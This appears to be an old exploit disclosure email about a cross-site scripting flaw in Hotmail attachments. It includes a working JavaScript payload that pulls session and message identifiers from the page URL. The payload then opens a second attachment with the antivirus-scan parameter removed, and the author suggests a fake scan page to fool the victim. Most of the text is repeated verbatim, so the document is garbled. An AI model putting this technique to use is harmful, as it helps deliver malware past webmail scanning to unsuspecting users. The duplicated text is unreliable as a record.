K
Krypt Kreeper
In this e-mail I will train you Microsoft monkeys (no
offence), and to show you a practical exploit of the XSS
on Hotmail webmail server,
It is very easy to force a target user to do something
that he would
never had allowed: downloading a virus (from Hotmail, of
course) I was thinking on some
kind of mailbox access, but I needed ActiveX help, and
some people could think:
"I do not allow ActiveX on my browser..." or "I run
Mozilla...", etc.So the challenge has
been to show how only with javascript, an XSS
theoretically non
exploitable (no access to cookies), and some
misconfiguration on Hotmail webmail can
result in a serious security problem.
1) I know XSS is present (on file attachments) (good)
2) No access to cookies from the code injected (bad)
3) Is not a flaw in input filtering, any script code is
allowed (good)
4) I don't know if there is any kind of IP based session
tracking method (bad)
5) Redirecting the output of forced client requests from
the XSS code is possible (good)
6) The code to successfully exploit redirection (ActiveX,
XMLhttprequest,...) is browser
dependant (bad)
So at least the only room one has to play is Javascript
(exploiting XSS only with HTML
injection doesn't seem to be effective in this case...)
If we take a look at the URL from where attachments are
opened, we can see the session
identifier and message identifier. With this info we can
build a request to... the same message we
have sent?
Yes, yes, yes. The same message (same identifier) can have
many attachments...
We can make a request to the same message but different
attachment...
Why this??? Imagine that we could bypass the antivirus
software only with a little modification
of the HTTP request... We could not do this in the same
attachment we send our XSS code,
because this is directly opened by the browser of the
target, but we could still force a crafted
request from our XSS code to open a different attachment
(on the same message) and without calling the
AV software.
How to bypass the AV software...
This a sample URL to get an attachment from Hotmail.
http://by7fd.bay7.hotmail.msn.com/cgi-bin/getmsg?
curmbox=F000000001&
a=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&msg=MSGXXXXXXXXXX.XX&sta
rt=XXXXXXX& len=XXXX&mimepart=3&vscan=scan
"vscan=scan" ... ummm... Remove this, and the antivirus
will not be called! Scared? Wait...
Now lets send to the target user a mail with two
attachments. The first one whit this code:
-----------------------------------------------------------
----------------------------------
<html>
<script>
str1=document.URL
str2=str1.slice(55,110)
splitString = str2.split("&")
str3=splitString[0]+"&"+splitString[1]
window.open('http://by7fd.bay7.hotmail.msn.com/cgi-
bin/getmsg?curmbox=F000000001&a='+str3+'&mimepart=4')
</script>
</html>
-----------------------------------------------------------
-----------------------------------
The second attachment will be a virus testing file (for
example EICAR).
Once the target opens the first attachment, the AV
software will tell him that all it's OK, but
when he tries to download the file, it will be
opened "online", the XSS code will be executed and:
-session ID and message IDwill be retrieved
-a new window will be opened pointing to the second
attachment, but without calling AV software
What can see the user?
He will see that he can download the file, without any AV
warning, he will see that is downloading from
Hotmail.
An experienced user can notice that something strange it's
happening... but still is possible to trick him by
opening a similar page to the one showed when the AV
software is called... As always, now, the only limit is
the imagination of the attacker.
Conclusions:
-XSS is present on Hotmail
-Hotmail Antivirus software can easily be bypassed
exploiting this XSS
-Users of Hotmail are on high risk
A new generation of XSS is coming....
Sincerely,
-Krypt Kreeper-
offence), and to show you a practical exploit of the XSS
on Hotmail webmail server,
It is very easy to force a target user to do something
that he would
never had allowed: downloading a virus (from Hotmail, of
course) I was thinking on some
kind of mailbox access, but I needed ActiveX help, and
some people could think:
"I do not allow ActiveX on my browser..." or "I run
Mozilla...", etc.So the challenge has
been to show how only with javascript, an XSS
theoretically non
exploitable (no access to cookies), and some
misconfiguration on Hotmail webmail can
result in a serious security problem.
1) I know XSS is present (on file attachments) (good)
2) No access to cookies from the code injected (bad)
3) Is not a flaw in input filtering, any script code is
allowed (good)
4) I don't know if there is any kind of IP based session
tracking method (bad)
5) Redirecting the output of forced client requests from
the XSS code is possible (good)
6) The code to successfully exploit redirection (ActiveX,
XMLhttprequest,...) is browser
dependant (bad)
So at least the only room one has to play is Javascript
(exploiting XSS only with HTML
injection doesn't seem to be effective in this case...)
If we take a look at the URL from where attachments are
opened, we can see the session
identifier and message identifier. With this info we can
build a request to... the same message we
have sent?
Yes, yes, yes. The same message (same identifier) can have
many attachments...
We can make a request to the same message but different
attachment...
Why this??? Imagine that we could bypass the antivirus
software only with a little modification
of the HTTP request... We could not do this in the same
attachment we send our XSS code,
because this is directly opened by the browser of the
target, but we could still force a crafted
request from our XSS code to open a different attachment
(on the same message) and without calling the
AV software.
How to bypass the AV software...
This a sample URL to get an attachment from Hotmail.
http://by7fd.bay7.hotmail.msn.com/cgi-bin/getmsg?
curmbox=F000000001&
a=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&msg=MSGXXXXXXXXXX.XX&sta
rt=XXXXXXX& len=XXXX&mimepart=3&vscan=scan
"vscan=scan" ... ummm... Remove this, and the antivirus
will not be called! Scared? Wait...
Now lets send to the target user a mail with two
attachments. The first one whit this code:
-----------------------------------------------------------
----------------------------------
<html>
<script>
str1=document.URL
str2=str1.slice(55,110)
splitString = str2.split("&")
str3=splitString[0]+"&"+splitString[1]
window.open('http://by7fd.bay7.hotmail.msn.com/cgi-
bin/getmsg?curmbox=F000000001&a='+str3+'&mimepart=4')
</script>
</html>
-----------------------------------------------------------
-----------------------------------
The second attachment will be a virus testing file (for
example EICAR).
Once the target opens the first attachment, the AV
software will tell him that all it's OK, but
when he tries to download the file, it will be
opened "online", the XSS code will be executed and:
-session ID and message IDwill be retrieved
-a new window will be opened pointing to the second
attachment, but without calling AV software
What can see the user?
He will see that he can download the file, without any AV
warning, he will see that is downloading from
Hotmail.
An experienced user can notice that something strange it's
happening... but still is possible to trick him by
opening a similar page to the one showed when the AV
software is called... As always, now, the only limit is
the imagination of the attacker.
Conclusions:
-XSS is present on Hotmail
-Hotmail Antivirus software can easily be bypassed
exploiting this XSS
-Users of Hotmail are on high risk
A new generation of XSS is coming....
Sincerely,
-Krypt Kreeper-